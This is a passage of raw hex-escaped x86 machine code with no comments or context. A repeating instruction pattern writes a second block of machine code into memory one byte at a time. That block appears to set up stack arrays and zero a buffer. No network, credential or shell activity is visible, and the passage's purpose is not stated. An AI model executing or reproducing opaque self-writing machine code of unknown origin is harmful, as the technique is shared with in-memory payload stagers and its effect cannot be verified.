6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x84\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x14\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x88\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x13\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x19\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x18\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x94\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x16\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x10\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x11\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xbc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xab\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x84\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x12\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x88\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x94\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x11\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x19\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x18\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x14\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x13\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xbc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x15\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x16\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xdc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x10\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x19\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x50\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x10\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x